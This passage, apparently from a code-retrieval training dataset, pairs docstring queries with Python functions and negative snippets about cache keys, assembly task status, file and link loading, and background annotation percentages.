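For illustration only, the loader above expects a YAML document with a top-level files key holding a list of links. A hypothetical assets/nordpool_files.yml and the equivalent parse step might look like the sketch below; the actual file names and URLs in the package are not reproduced here.

import yaml

# Hypothetical example of what assets/nordpool_files.yml could contain.
sample = """
files:
  - https://example.com/elspot-prices_2020_daily_nok.xls
  - https://example.com/elspot-prices_2021_daily_nok.xls
"""

links = yaml.safe_load(sample).get('files', [])
assert links[0].endswith('2020_daily_nok.xls')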
|
[
"def links():\n links_list = tasks.json_list(os.path.join(pathlib.Path(__file__).parent.absolute(),'static/links.json'))\n return render_template('links.html',title='collegeSmart - Helpful Links',links=links_list)",
"def load_links():\n # if .hn doesn't exist, return empty list\n if not os.path.isfile(HN_PATH):\n return []\n # otherwise, load it up\n hn_links = json.load(open(HN_PATH, 'r'))\n return hn_links",
"def _load_links(self) -> NoReturn:\n total = self.project_size[2]\n self._links = {\n self.object_name(shared_enum.ElementType.LINK, index): index\n for index in range(total)\n }",
"def resources():",
"def gen_links() -> ReleaseAssets:\n # also fairly brittle when moving to another repo\n bucket = f\"{bucket_root}/{args.tag}\"\n src_name = f\"{gitlab_repo}-release-{args.tag}-dist.tgz\"\n sif_name = f\"{gitlab_repo}-release-{args.tag}.sif\"\n return ReleaseAssets(\n [\n Link(\n name=src_name,\n url=f\"{bucket}/{src_name}\",\n filepath=f\"/{src_name}\",\n link_type=LinkType.package,\n ),\n Link(\n name=sif_name,\n url=f\"{bucket}/{sif_name}\",\n filepath=f\"/{sif_name}\",\n link_type=LinkType.image,\n ),\n ]\n )",
"def load_resources(section, names):\n for name in names:\n RESOURCES[section].append(\n json.load(\n open(os.path.join(PROJECT_ROOT,\n 'static',\n 'js',\n '{0}.json'.format(name)))))",
"def fetch_links(self, normalized_name):\n package_url = f\"{self.index_url}/{normalized_name}\"\n text = CACHE.get(\n path_or_url=package_url,\n as_text=True,\n force=not self.use_cached_index,\n )\n links = collect_urls(text)\n # TODO: keep sha256\n links = [l.partition(\"#sha256=\") for l in links]\n links = [url for url, _, _sha256 in links]\n return links",
"async def yaml_resources(self):\n await self.log.debug('yaml_resources', 'Started')\n resources = {}\n yamlfile = \"{}/ui-lovelace.yaml\".format(self.base_dir)\n if os.path.isfile(yamlfile):\n with open(yamlfile, encoding='utf-8',\n errors='ignore') as localfile:\n load = yaml.load(localfile, Loader)\n resources = load.get('resources', {})\n localfile.close()\n else:\n await self.log.error(\n 'yaml_resources', 'Lovelace config in yaml file not found')\n await self.log.debug('yaml_resources', resources)\n return resources",
"def load_directories(self):\n self.SRC_DIR = Path(__file__).parent / \"src\"\n self.ASSETS_DIR = self.SRC_DIR / \"assets\"\n self.IMAGES = self.ASSETS_DIR / \"images\" \n self.MAPS = self.ASSETS_DIR / \"maps\"\n self.SFX = self.ASSETS_DIR / \"sfx\"\n self.MUSIC = self.ASSETS_DIR / \"music\"",
"def loadArticles():\n #print \"loadArticles()\"\n topDir = \"/home/phil/proj/euroelection\"\n allFns = os.listdir(topDir)\n artFns = [fn\n for fn in allFns\n if fn.endswith(\".art\")]\n #print \"loadArticles() artFns=%r\" % (artFns,)\n for artFn in artFns:\n artPn = topDir+\"/\"+artFn\n #print \"loading articles in <%s>...\" % (artPn,)\n artFStr = butil.readFile(topDir+\"/\"+artFn)\n readArticles(artFStr)\n #//for",
"def _copy_resources(self):\n resources = {}\n for _, article in self.config.special_articles.iteritems():\n resources.update(article.full['local_references'])\n for article in self.config.articles_by_date:\n resources.update(article.full['local_references'])\n for source, dest in resources.iteritems():\n dest_file = os.path.join(self.config.output_dir, *dest)\n url = self.config.url + '/'.join(*dest)\n logger.info('Writing resource \\'%s\\'...' % url)\n self.fileproc.copy_file(source, dest_file)",
"def get_assets(self):\n for root, dir, files in os.walk(self.config.main.assetdir):\n for name in files:\n asset = os.path.join(root, name)\n self.assets.append(parse_asset(asset))",
"def getImageUrls(file_name):\n\n # if no file_name, return empty list\n if not file_name:\n return []\n\n file_path = os.path.join(PROJECT_ROOT, file_name)\n with open(file_path) as url_file:\n urls = url_file.readlines()\n\n # Close opend file\n url_file.close()\n urls = [line.strip() for line in urls]\n\n return urls",
"def load_urls(self,filename='defaultsne.csv'):\n\t\tname_file = os.path.join(self.pars.csv_dir,filename)\n\t\tnames = pd.read_csv(name_file).Name\n\t\tself.url_filename = filename\n\t\tself.urls = [self.pars.prefix+name.replace(' ','%20')+'.json' \\\n\t\t\tfor name in names]",
"def get_links():\n\n directory = \"../_posts\"\n\n for file in os.scandir(directory):\n filename = os.fsdecode(file)\n print(f\"The file's name with path is: {filename}\")\n if filename.endswith(\".html\"):\n write_teaser_image(filename)\n else:\n print(\"Not an HTML file!\")",
"def main():\n start = \"http://www.harkavagrant.com/archive.php\"\n pagelinks = getPageLinks(start)\n piclinks = getComicLinks(pagelinks)\n # one dir for harkavagrant-hosted images, and one dir for other ones\n checkdir(\"original\")\n checkdir(\"other\")\n retrieve(piclinks)",
"def _set_assets(self, root: str, theme: LayoutTheme):\r\n css_base = [root + 'goldenlayout-base.css',\r\n root + 'goldenlayout-elvis.css',\r\n root + 'panel-customizations.css']\r\n css_theme = {LayoutTheme.LIGHT: [root + 'goldenlayout-elvis-light.css',\r\n root + 'panel-customizations-light.css'],\r\n LayoutTheme.DARK: [root + 'goldenlayout-elvis-dark.css',\r\n root + 'panel-customizations-dark.css']}\r\n js_files = {'jquery': root + 'js\\jquery-1.11.1.min.js',\r\n 'goldenlayout': root + 'js\\goldenlayout.min.js'}\r\n css_files = css_base + css_theme[theme]\r\n pn.config.js_files = js_files\r\n pn.config.css_files = css_files",
"def images(name):\n\n return static_file(name, root='images/')",
"def link_files(self):\n\n for package in self.packages:\n package.link_files()\n\n for _file in self.files:\n if _file.create_link:\n _file.link()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Computes the cache key for assemble status. ``task`` must be one of the ``AssembleTask`` values. The scope can be the identifier of any model, such as the organization or project that this task is performed under. ``checksum`` should be the SHA1 hash of the main file that is being assembled.
|
def _get_cache_key(task, scope, checksum):
return 'assemble-status:%s' % hashlib.sha1(b'%s|%s|%s' % (
str(scope).encode('ascii'),
checksum.encode('ascii'),
task,
)).hexdigest()
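
A rough, self-contained sketch of the key format produced above. The task name, scope and checksum passed in at the bottom are placeholders, not real AssembleTask values, and every component is coerced to bytes explicitly so the hashing step behaves the same regardless of the type of task.

import hashlib

def demo_cache_key(task, scope, checksum):
    # Same 'scope|checksum|task' layout as _get_cache_key above, but with
    # an explicit ASCII encode on every component.
    raw = b'%s|%s|%s' % (
        str(scope).encode('ascii'),
        checksum.encode('ascii'),
        str(task).encode('ascii'),
    )
    return 'assemble-status:%s' % hashlib.sha1(raw).hexdigest()

# Placeholder task name, scope id and SHA1 digest.
print(demo_cache_key('dif', 42, 'da39a3ee5e6b4b0d3255bfef95601890afd80709'))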
|
[
"def get_assemble_status(task, scope, checksum):\n cache_key = _get_cache_key(task, scope, checksum)\n rv = default_cache.get(cache_key)\n if rv is None:\n return None, None\n return tuple(rv)",
"def hash_task(self, _task):\n ht = hashlib.blake2b(digest_size=12)\n ht.update(_task.encode('utf-8'))\n hsh = ht.hexdigest()\n # # it's a set, so don't worry about adding a hash multiple times\n # self.task_hashes.add(hsh)\n\n return hsh",
"def set_assemble_status(task, scope, checksum, state, detail=None):\n cache_key = _get_cache_key(task, scope, checksum)\n default_cache.set(cache_key, (state, detail), 600)",
"def make_task_cache_dirname(task):\n return task.fingerprint",
"def get_cache_key(class_name, settings=()):\n return '#{0}:{1}'.format(class_name, hash(tuple(settings)))",
"def getTaskKey(self, task_id):\n return",
"def get_cache_key(self, request, view):\n ip_address = request.data.get('ip_address')\n return self.cache_format % {\n 'scope': self.scope,\n 'ident': ip_address or self.get_ident(request)\n }",
"def _get_cache_key(self, **kwargs):\n m = md5()\n for significant_kwarg in self.significant_kwargs:\n key, to_str = significant_kwarg\n m.update(to_str(kwargs[key]))\n\n if hasattr(self, 'cache_prefix'):\n cache_prefix = self.cache_prefix\n else:\n cache_prefix = '%s.%s' % (self.__module__, self.__name__)\n return '%s:%s' % (cache_prefix, m.hexdigest())",
"def _blacklist_cache_key(t):\n key_data = 'blacklist%(s_data)s' % {\n 's_data': t\n }\n if six.PY3:\n key_data = key_data.encode('utf-8')\n\n key = hashlib.sha1()\n key.update(key_data)\n return key.hexdigest()",
"def _hash_flow(self, flow: Flow) -> str:\n prefect_version = Version(prefect.__version__)\n\n if prefect_version < parse(\"0.15.0\"):\n tenant_id = Client()._active_tenant_id # type: ignore # pylint: disable=no-member\n else:\n tenant_id = Client().tenant_id # type: ignore\n\n identifying_content = [\n self.prefect_cloud_project_name,\n flow.name,\n tenant_id,\n ]\n hasher = hashlib.sha256()\n hasher.update(cloudpickle.dumps(identifying_content))\n return hasher.hexdigest()",
"def _build_cache_key(self, *args):\n return self.key if not self.key_mod else self.key % tuple(args)",
"def compute_hash(self) -> str:\n # Replace dependencies with their hashes and functions with source.\n computation = self._subs_dependencies_with_hash(self.computation)\n computation = self._subs_tasks_with_src(computation)\n # Return the hash of the resulting computation.\n comp_hash: str = joblib.hash(cloudpickle.dumps(computation))\n return comp_hash",
"def _get_cache_key(self, **kwargs):\n key = 'cartodb_%s_' % _geohash.encode(\n kwargs.pop('lat'), kwargs.pop('lon'))[:8]\n key += '_'.join([\n '%s=%s' % (k, kwargs[k]) for k in sorted(kwargs.iterkeys())])\n return key",
"def _tuple_to_cache_key(t):\n key_data = '(%(s_data)s)' % {\n 's_data': ','.join(t)\n }\n if six.PY3:\n key_data = key_data.encode('utf-8')\n\n key = hashlib.sha1()\n key.update(key_data)\n return key.hexdigest()",
"def as_cache_key(self, ireq):\n extras = tuple(sorted(ireq.extras))\n if not extras:\n extras_string = \"\"\n else:\n extras_string = \"[{}]\".format(\",\".join(extras))\n name = _key_from_req(ireq.req)\n version = get_pinned_version(ireq)\n return name, \"{}{}\".format(version, extras_string)",
"def _getTaskName(self, taskClass, kwargs):\n className = taskClass\n suffix = kwargs.pop('taskName', None)\n if suffix:\n className += '-' + suffix\n elif kwargs == {}:\n # Ok, don't add any suffix.\n pass\n else:\n m = hashlib.sha256()\n m.update(repr(kwargs))\n className += '-' + m.hexdigest()\n return className",
"def __get_task_cache(self, task: str, client: str):\n # Prevents execution if we are in a different version than v10 of Automation Anywhere Control Room\n if self.automation_anywhere_version != 'v10':\n return -1\n fname = task.split('\\\\')[-1]\n self.__logger.debug('Looking for cache for task \\'{fname}\\''.format(fname=fname))\n query = 'select trd.Id as id from TaskRunDetails trd, Tasks t, Clients c, Users u where\t' \\\n 'trd.TaskId=t.id and trd.ClientId=c.id and trd.UserId=u.id and ClientStatus=0 and IsTaskExecutionCompleted=0 and ' \\\n 'u.UserName=\\'{username}\\' and c.HostName=\\'{client}\\' and t.FileName=\\'{filename}\\''.format(username=self.__username,\n client=client,\n filename=fname\n )\n try:\n row = self.__database_conn.execute(query).fetchall()\n cache = []\n for r in row:\n cache.append(r['id'])\n if len(cache) > 0:\n self.__logger.debug('Got cache ids: {cache}'.format(cache=','.join([str(x) for x in cache])))\n return cache\n return None\n except Exception as error:\n self.__logger.error('Unable to execute query {query}:{err}'.format(query=query, err=error))\n raise",
"def __cache_key__(*args, **kwargs):\n return args_to_key(base, args, kwargs, False)",
"def sync_check_hash(task, force=False, job_id=None):\n set_thread_data(job_id)\n logger = get_logger()\n if force is True:\n return\n with sqla_session() as session:\n stored_hash = Device.get_config_hash(session, task.host.name)\n if stored_hash is None:\n return\n\n task.host.open_connection(\"napalm\", configuration=task.nornir.config)\n res = task.run(task=napalm_get, getters=[\"config\"])\n task.host.close_connection(\"napalm\")\n\n running_config = dict(res.result)['config']['running'].encode()\n if running_config is None:\n raise Exception('Failed to get running configuration')\n hash_obj = sha256(running_config)\n running_hash = hash_obj.hexdigest()\n if stored_hash != running_hash:\n raise Exception('Device {} configuration is altered outside of CNaaS!'.format(task.host.name))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Checks the current status of an assembling task. Returns a tuple in the form ``(status, details)``, where ``status`` is the ChunkFileState, and ``details`` is either None or a string containing a notice or error message.
|
def get_assemble_status(task, scope, checksum):
cache_key = _get_cache_key(task, scope, checksum)
rv = default_cache.get(cache_key)
if rv is None:
return None, None
return tuple(rv)
|
[
"def build_status():\r\n from SCons.Script import GetBuildFailures\r\n bf = GetBuildFailures()\r\n if bf:\r\n # bf is normally a list of build failures; if an element is None,\r\n # it's because of a target that scons doesn't know anything about.\r\n status = 'failed'\r\n failures_message = \"\\n\".join([\"Failed building %s\" % bf_to_str(x)\r\n for x in bf if x is not None])\r\n else:\r\n # if bf is None, the build completed successfully.\r\n status = 'ok'\r\n failures_message = ''\r\n return (status, failures_message)",
"def get_successful_completion(status, msg):\n if status:\n raise Exception(\n \"The workflow did not complete successfully, \"\n \"or there is nothing to be done (all expected outputs have been produced).\"\n )\n else:\n print(msg)",
"def test_get_task_status(self):\n pass",
"def status(self, result, config=None):\r\n return result['status']",
"def import_status(self):\n result = self.__get_object('imports', None, None)\n if not 'status' in result:\n self.log.error(\"Unable to find 'status' key in result: %s\" % (result))\n return None \n elif not result['status'] in ['ready', 'queued', 'processing', 'succeeded', 'failed' ]:\n self.log.error(\"Unexpected status '%s' for import status. Check API and update library. Result = %s\" % (status, result))\n return None\n return result",
"def status_detail(self):\n if self.is_successful():\n return \"Status was OK, no details\"\n else:\n return self._response['StatusDetail']",
"def status(self):\n _id = self.pk\n version_id = self.version.pk\n done = self.done\n steps = [\"Parsing\", \"Preprocessing\", \"Processing\", \"Saving\"]\n result_url = \"/api/job/{}/result\".format(_id) if done else None\n progress = {\n 'step': len(steps) if done else 0,\n 'max_step': len(steps),\n 'step_progress': 1,\n 'total_progress': 1 if done else 0,\n 'done': done\n }\n # If the job is happening, we need to obtain the async task's information\n if self._current and self._current.status == 'PROGRESS':\n step = self._current.info.step\n progress = {\n 'step': step,\n 'max_step': len(steps),\n 'step_progress': 0,\n 'total_progress': float(step) / float(len(steps)),\n 'done': False\n }\n else:\n return {\n 'job_id': _id,\n 'version_id': version_id,\n 'steps': steps,\n 'result_url': result_url,\n 'progress': progress\n }",
"def status(self):\n\t\tif self.canceling:\n\t\t\treturn \"%s: canceling\" % self.title\n\t\telse:\n\t\t\treturn \"%s: %s\" % (self.title,\n\t\t\t\t\t\tself._internalTask.status)",
"def get_task_status(self, name, machine):\n item = self._get_task_item(name, machine)\n if item:\n return item['status']\n return None",
"def status(self):\n if self.failures > 0:\n return \"partial\"\n else:\n return \"success\"",
"def task_check(self,tid):\n#\t\tprint \"task_check \",tid\n\t\ttry :\n\t\t\ttask=self.active[tid]\n\t\t\tif task==None: raise Exception\n\t\texcept:\n\t\t\ttask=self.complete[tid]\t\t# if we succeed in retrieving it from the complete list, it's done (or aborted)\n\t\t\treturn 100\n\n\t\tif task.starttime==None or task.starttime<1 : return -1\n\t\tif task.progtime==None : return 0\n\t\treturn task.progtime[1]",
"def get_upload_status(uploadId=None):\n pass",
"def retrieve_status(fname, task_name):\n tasks, events, params = read_task_db(fname)\n\n task = tasks[tasks.name == task_name]\n l1_datasets = params[params.name == 'level1']\n\n # event status for the DataStandardisation Task\n status = task.merge(events, how='left', left_on='id', right_on='task_id',\n suffixes=['_{}'.format(task_name), '_events'])\n\n # final status for each DataStandardisation Task\n final_status = status.drop_duplicates('id_{}'.format(task_name),\n keep='last')\n\n # get the DONE, FAILED & PENDING Tasks\n # (if the task status is PENDING:\n # then the compute job could've timed out\n # or\n # an upstream dependency failed for some reason\n done = final_status[final_status.event_name == 'DONE']\n fail = final_status[final_status.event_name == 'FAILED']\n pending = final_status[final_status.event_name == 'PENDING']\n\n l1_done = done.merge(l1_datasets, how='left', right_on='task_id',\n left_on='id_{}'.format(task_name))\n l1_fail = fail.merge(l1_datasets, how='left', right_on='task_id',\n left_on='id_{}'.format(task_name))\n l1_pending = pending.merge(l1_datasets, how='left', right_on='task_id',\n left_on='id_{}'.format(task_name))\n\n return l1_done, l1_fail, l1_pending",
"def parse_cobalt_step_status(output: str, step_id: str) -> str:\n status = \"NOTFOUND\"\n for line in output.split(\"\\n\"):\n fields = line.split()\n if len(fields) >= 2:\n if fields[0] == step_id:\n status = fields[1]\n break\n return status",
"def parseStatus(self):\n if self.parseSuccessful:\n self.completionMessage += \"\\nvalue: \" + str(self.tree.value()) + \\\n \"\\nPreorder: \" + self.tree.prefix() + \\\n \"\\nInorder: \" + self.tree.infix() + \\\n \"\\nPostorder: \" + self.tree.postfix()\n return self.completionMessage",
"def get_status(self):\n return self.client.get_asg_ready(self.env, self.name)",
"def do_status(self):\n return \"Waiting for {0.prefill_in} frames; Streaming from ffmpeg: {0.ffmpeg_ready}\".format(self)",
"def dms_check_task_status(**kwargs):\n dms_task_name = 'example-task'\n\n try:\n task = dms_client.describe_replication_tasks(\n Filters=[{'DMS task name': 'replication-task-id','Values': [dms_task_name]}]\n )['ReplicationTasks'][0]\n\n logger.info(f\"Task name: '{task['ReplicationTaskIdentifier']}'. Status: {task['Status']}\")\n\n if task['Status'] == 'stopped':\n logger.info(f\"DMS task name: {task['ReplicationTaskIdentifier']}. Status: {task['Status']}. Reason: {task['StopReason']}\")\n \n return task\n\n except:\n logger.info(f\"ERROR checking the status of the task: {dms_task_name}. Please check.\")\n\n return",
"def _get_status(args, item):\n func = args.split('|')[-1][1:]\n if not item['result']:\n result = 'ERROR'\n elif func in PRESENT_FUNCS:\n result = \"PRESENT\"\n elif func in ABSENT_FUNCS:\n result = \"ABSENT\"\n else:\n # As we iterate on the Sal managed item statuses, just assume\n # that if it isn't an error, and not an \"ABSENT\", that it is\n # successful and should be considered \"PRESENT\" for lack of\n # something more accurate; e.g. longterm it will probably be\n # either whatever str you want to use for status, or something\n # more indicative of desired state; Okay/Error/Pending/Changed?\n result = \"PRESENT\"\n return result"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Updates the status of an assembling task. It is cached for 10 minutes.
|
def set_assemble_status(task, scope, checksum, state, detail=None):
cache_key = _get_cache_key(task, scope, checksum)
default_cache.set(cache_key, (state, detail), 600)
|
[
"def update_task_state():\n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n task_to_update = Task.query.get(task_id)\n\n if task_to_update: \n task_to_update.finished = not task_to_update.finished\n db.session.commit()\n \n return jsonify({})",
"def update_task_status(registered_task_name, status):\n\n if status == Task.IN_PROGRESS:\n Task.objects.filter(registered_task__task_name=registered_task_name).update(\n status=status, started_at=datetime.now(timezone.utc))\n elif status in {Task.SUCCESS, Task.FAILED}:\n Task.objects.filter(registered_task__task_name=registered_task_name).update(\n status=status, finished_at=datetime.now(timezone.utc))\n else:\n Task.objects.filter(registered_task__task_name=registered_task_name).update(\n status=status, started_at=None, finished_at=None)",
"def update_task_state(self, result=None, task_status=TaskState.RUNNING.value, task_uid=None):\n result = result or {}\n\n try:\n if task_uid:\n self.task = get_export_task_record(task_uid)\n celery_uid = self.request.id\n if not celery_uid:\n raise Exception(\"Failed to save celery_UID\")\n self.task.celery_uid = celery_uid\n result = parse_result(result, \"status\") or []\n if TaskState.CANCELED.value in [self.task.status, self.task.export_provider_task.status, result]:\n logging.info(\"canceling before run %s\", celery_uid)\n self.task.status = TaskState.CANCELED.value\n self.task.save()\n raise CancelException(task_name=self.task.export_provider_task.name)\n # The parent ID is actually the process running in celery.\n self.task.pid = os.getppid()\n if task_status:\n self.task.status = task_status\n if TaskState[task_status] == TaskState.RUNNING:\n self.task.export_provider_task.status = TaskState.RUNNING.value\n self.task.export_provider_task.run.status = TaskState.RUNNING.value\n # Need to manually call to trigger method overrides.\n self.task.save()\n self.task.export_provider_task.save()\n self.task.export_provider_task.run.save()\n logger.debug(\"Updated task: {0} with uid: {1}\".format(self.task.name, self.task.uid))\n except DatabaseError as e:\n logger.error(\"Updating task {0} state throws: {1}\".format(self.task.uid, e))\n raise e",
"def task_updated(event: Event):\n data = {\"status\": event.get(\"state\", \"RUNNING\")}\n\n # Rather than send all data, only pass on known fields\n for field in [\"log\", \"urls\"]:\n value = event.get(field)\n if value:\n data.update({field: value})\n\n update_job(event[\"task_id\"], data)",
"def sde_update_task_status(self, task, status):\n if not self.sde_plugin:\n raise AlmException('Requires initialization')\n\n logger.debug('Attempting to update task %s to %s' % (task['id'], status))\n\n try:\n self.sde_plugin.api.update_task_status(task['id'], status)\n except APIError, err:\n logger.error(err)\n raise AlmException('Unable to update the task status in SD '\n 'Elements. Either the task no longer '\n 'exists, there was a problem connecting '\n 'to the server, or the status was invalid')\n logger.info('Status for task %s successfully set in SD Elements' % task['id'])\n\n note_msg = 'Task status changed to %s via %s' % (status, self.alm_name)\n try:\n self._add_note(task['id'], note_msg, '', status)\n except APIError, err:\n logger.error('Unable to set a note to mark status '\n 'for %s to %s. Reason: %s' % (task['id'], status, str(err)))",
"def updateGCITask(self, request, id, *args, **kwargs):\n id = int(id)\n\n task = GCITask.get_by_id(id)\n\n if not task:\n # invalid task data, log and return OK\n return error_handler.logErrorAndReturnOK(\n 'No GCITask found for id: %s' % id)\n\n task_logic.updateTaskStatus(task)\n\n return http.HttpResponse()",
"def update(self, task):\n\t\tself.tasks.append(db.Text(task))\n\t\treturn self",
"def update_complete_tasks(self, state: State):\n next_state = state #.copy()\n completed_tmp = []\n for task_id in next_state.tasks_ongoing:\n if next_state.tasks_progress[task_id] >= 0.9999:\n next_state.tasks_progress[task_id] = 1\n completed_tmp.append(task_id)\n for completed_task in completed_tmp:\n next_state.tasks_complete.add(completed_task)\n next_state.tasks_ongoing.remove(completed_task)\n for res in next_state.resource_used_for_task[completed_task]:\n res_consumption = next_state.resource_used_for_task[completed_task][res]\n if self.is_renewable(res):\n next_state.resource_used[res] -= res_consumption\n next_state.resource_used_for_task.pop(completed_task)\n next_state.tasks_details[completed_task].end = next_state.t+1\n # WARNING : considering how it's coded, we should put +1 here. could be ccleaner if it was done in the update_progress.\n\n return next_state",
"def onboard_task_update(context, task_id, values, session=None):\n values = dict([(k, v) for k, v in values.iteritems() if v is not None])\n status = values.get('status', '')\n #If this is a final status, then set the end date/time\n if status == 'completed' or status == 'failed':\n values['ended'] = timeutils.utcnow()\n if not session:\n session = nova_db_sa_api.get_session()\n with session.begin():\n query = model_query(\n context, pvc_models.OnboardTaskDTO, session=session)\n task_ref = query.filter_by(id=task_id).first()\n task_ref.update(values)\n task_ref.save(session=session)\n return task_ref",
"def mongo_update_task(job_id, task_id, aic, bic, labels, elapsed_time, elapsed_read_time, elapsed_processing_time):\n response = mongo.db.tasks.update_one(\n {'job_id': job_id, 'task_id': task_id},\n {'$set': {'task_status': 'done', 'aic': aic, 'bic': bic, 'labels': labels,\n 'elapsed_time': elapsed_time, 'elapsed_read_time': elapsed_read_time,\n 'elapsed_processing_time': elapsed_processing_time}})\n return response",
"def startUpdatingTask(task, transactional=False):\n url = '/tasks/gci/ranking/update'\n params = {\n 'id': task.key().id_or_name()\n }\n taskqueue.add(queue_name='gci-update', url=url, params=params,\n transactional=transactional)",
"def runATask(self,task : TaskInformation):\n if self.deviceLock.acquire():\n try:\n for device in task.devices:\n task.status = \"Running\"\n self.devices[device].addATask(task)\n finally:\n self.deviceLock.release()",
"def on_success(self, retval, celery_task_id, args, kwargs):\n kt_id = args[2]\n #update in SUCCESS status\n kt = KnapsackTask.objects.get(id=kt_id)\n kt.celery_task_id = celery_task_id\n kt.status = 'SUCCESS'\n kt.done = True\n kt.result_value = retval[0]\n kt.result_weight = retval[1]\n kt.result_items = retval[2]\n kt.task_solve_start = retval[3]\n kt.task_solve_end = retval[4]\n kt.task_solution_duration = retval[4] - retval[3]\n kt.task_total_duration = retval[4] - kt.task_created\n kt.save()",
"def reopen_task(self):\r\n if self.cal_event_list:\r\n # tracked_duration > 0\r\n self.task_status = STATUS_IN_PROGRESS\r\n else:\r\n self.task_status = STATUS_PENDING",
"def task_status(task_id):\n logger.info(\"Consulting task status ...\")\n task = Task(task_id)\n if not task.status:\n raise AppError(\"task_error\",\"Task not found!\")\n\n _status = task.status\n _status['celery_status'] = None\n try:\n logger.info(\"Getting status..\")\n celery_task = celery_app.AsyncResult(task_id)\n #celery_task = eval(\"{}_task.AsyncResult('{}')\".format(task.name, task_id))\n _status['celery_status'] = celery_task.state \n except Exception as e:\n logger.error(e)\n logger.info(\"Serving status!\")\n return jsonify(_status)",
"def task_status_changed(sg, logger, event, args):\n\n # Return if we don't have all the field values we need.\n if (\n not event.get(\"entity\", {}).get(\"id\")\n or not event.get(\"meta\", {}).get(\"entity_id\")\n or not event.get(\"id\")\n ):\n return\n\n # Make some vars for convenience.\n entity_id = event[\"entity\"][\"id\"]\n entity_name = event[\"entity\"][\"name\"]\n status_mapping_field = args[\"status_mapping_field\"]\n\n # Re-query for the Task Status value to make sure we have an up-to-date\n # new status value. The input value from the event may be inaccurate if the\n # triggers are ever running behind.\n sg_task = sg.find_one(\"Task\", [[\"id\", \"is\", entity_id]], [\"sg_status_list\"])\n\n # Return if we can't find our Task.\n if not sg_task:\n logger.info(\n \"Unable to retrieve Task (%d) %s from SG for event %d, skipping.\"\n % (entity_id, entity_name, event[\"id\"])\n )\n return\n\n # Grab the Shotgun Status entity the Task was set to.\n new_task_status = sg.find_one(\n \"Status\",\n [[\"code\", \"is\", sg_task[\"sg_status_list\"]]],\n [status_mapping_field],\n )\n\n # Return if we can't find our Status entity (would be pretty weird).\n if not new_task_status:\n logger.info(\n \"No Status found with code %s, skipping.\" % sg_task[\"sg_status_list\"]\n )\n return\n\n # Return if the Status entity's sg_version_status_mapping value is empty.\n if new_task_status[status_mapping_field] is None:\n logger.debug(\n \"No sg_version_status_mapping found for Status with id %s, skipping.\"\n % new_task_status[\"id\"]\n )\n return\n\n # Get the latest Version attached to our Task.\n sg_version = sg.find_one(\n \"Version\",\n [[\"sg_task\", \"is\", sg_task]],\n [],\n order=[{\"field_name\": \"created_at\", \"direction\": \"desc\"}],\n )\n\n # Return if we can't find a Version attached to the Task.\n if not sg_version:\n logger.debug(\"No Version linked to Task with id %s, skipping.\" % entity_id)\n return\n\n # Update the Version's sg_status_field with the Status entity's\n # sg_version_status_mapping value.\n try:\n result = sg.update(\n \"Version\",\n sg_version[\"id\"],\n {\"sg_status_list\": new_task_status[status_mapping_field]},\n )\n logger.debug(\"Result is: %s\" % result)\n except Exception as e:\n logger.warning(\n \"Could not update Version with id %s to Status %s: %s\"\n % (sg_version[\"id\"], new_task_status[status_mapping_field], str(e))\n )",
"def task_done(self, tid):\n\t\tEMTaskQueue.lock.acquire()\n\t\ttry:\n\t\t\ttask=self.active[tid]\n\t\t\tif task==None:\n\t\t\t\tprint \"*** Warning, task %d was already complete\"%tid\n\t\t\t\tEMTaskQueue.lock.release()\n\t\t\t\treturn\n\t\texcept:\n\t\t\tEMTaskQueue.lock.release()\n\t\t\treturn\n\n\t\ttask.progtime=(time.time(),100)\n\t\ttask.endtime=time.time()\n\t\tself.complete[tid]=task\n\t\tdel self.active[tid]\n\t\tEMTaskQueue.lock.release()\n\t\t#if self.complete[\"max\"]<tid : self.complete[\"max\"]=tid\n\t\t#self.active[\"min\"]=min(self.active.keys())",
"def update_tasks(self, name, status, machines=None):\n if name in self.tasks:\n for task in self.tasks[name]:\n if not machines or task['machine'] in machines:\n task['status'] = status",
"def cmd_task_update_state(self, args):\n task_id = args[0]\n state = args[1]\n data = {'state': state}\n self._update_obj(task_id, 'task', data)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return percentage of background annotations.
|
def bg_perc(self):
if self._bg_perc is None and self.task == 'preddet':
return 0.0
if self._bg_perc is None:
return 1.0
return self._bg_perc
|
[
"def getSegmentationProgessInPercentage(self) -> int:\n segmentedCount = self.getNumOfSegmented()\n float_Num = segmentedCount / self.getTotalNumImages()\n return int(float_Num * 100)",
"def get_background(self):\r\n\r\n\t\tif len(self) > 0:\r\n\t\t\tglobal_bg = np.array([0] * len(self[0].bg), dtype=float)\r\n\t\telse:\r\n\t\t\treturn None\r\n\r\n\t\ttotal_n = 0\r\n\t\tfor motif in self:\r\n\t\t\tglobal_bg += motif.bg * motif.n\r\n\t\t\ttotal_n += motif.n\r\n\r\n\t\treturn global_bg / total_n",
"def percent(x):\n return width(x) / center(x) * 100",
"def calc_background(self, tth):\n background = self._p_background\n int_bkgd = background.interpolate_by_points(tth)\n return int_bkgd",
"def avg_num_annotations_per_annotator(self):\n return self.num_units / self.num_annotators",
"def overall_percentage(self):\n return self._overall_percentage",
"def total_percentage(self) -> float:\n return (\n (self._pct / float(self._num_phases) +\n (100.0 * float(self._cur_phase) / float(self._num_phases))))",
"def get_n_perc(self,seq):\n\t\tn_count = float(str(seq).upper().count('N'))\n\t\treturn n_count / len(seq) * 100",
"def aln_read_coverage_fraction(HTSeq_alignment, percent_string=False):\n s, e = aln_read_coverage(HTSeq_alignment)\n fraction = (e-s)/len(HTSeq_alignment.read.seq)\n if percent_string: return \"%.0f%%\"%(fraction*100)\n else: return fraction",
"def checkpoint_percentages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:\n return pulumi.get(self, \"checkpoint_percentages\")",
"def percent(self) -> float:\n return (1.0 / self.maximum) * self.current",
"def _percentageOfGrid(self, percent):\n numSpecialPoints = int((self.numRows * self.numCols) * percent)\n return numSpecialPoints",
"def percent(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"percent\")",
"def get_percentage_text(self) -> str:\n return self._pct_text",
